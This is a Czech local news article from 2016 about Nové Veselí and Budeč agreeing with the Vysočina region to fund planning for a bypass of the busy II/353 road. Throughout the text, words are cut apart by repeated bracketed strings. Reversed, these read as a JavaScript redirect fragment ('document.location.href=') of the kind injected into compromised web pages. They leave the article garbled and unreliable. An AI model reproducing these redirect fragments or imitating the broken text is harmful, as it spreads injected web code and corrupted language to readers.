Rainbow page separator

V Novém Veselí zadají projekt pro stavbu obchvatu

Úterý, 26. ledna 2016

Nové Veselí, letecká fotografie

Nové Veselí / Dohoda o spolupráci mezi Krajem Vysočina a Budčí a Novým Veselím vznikla v souvislosti s možným urychlením realizace obchvatu Nového Veselí a Budče, přes které vede frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná silnice II/353 mezi Žďárem a Jihlavou.

„V rámci té[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to dohody bychom společně s obcí Budeč zadali a zároveň předfinancovali zpracování projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace k územnímu rozhodnutí na ten[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to obchvat. Na základě dokumentace
bychom následně prováděli odkupy stavbou dotčených pozemků od jejich majitelů,“ informoval starosta Nového Veselí Zdeněk Křivánek. Před začátkem realizace stavby obchvatu by podle jeho slov Kraj Vysočina pozemky vykoupil a také uhradil náklady spojené se zpracováním projek[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tové dokumentace. Dohodou budou také vymezeny komunikace, které po výstavbě obchvatu zůstanou ve správě kraje.

O obchvat, který by odvedl tranzitní dopravu z rušné spojnice mezi Žďárem nad Sázavou a Jihlavou, usilují v Novém Veselí už řadu let. Frekven[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovaná komunikace vede asi na třinácti s[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tovkách metrů středem městyse, přičemž v [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to úseku je i několik nepřehledných zatáček a další nebezpečná místa. Podle výsledků měření, které v Novém Veselí nechali provést, městysem denně projedou čtyři tisícovky osobních i nákladních aut.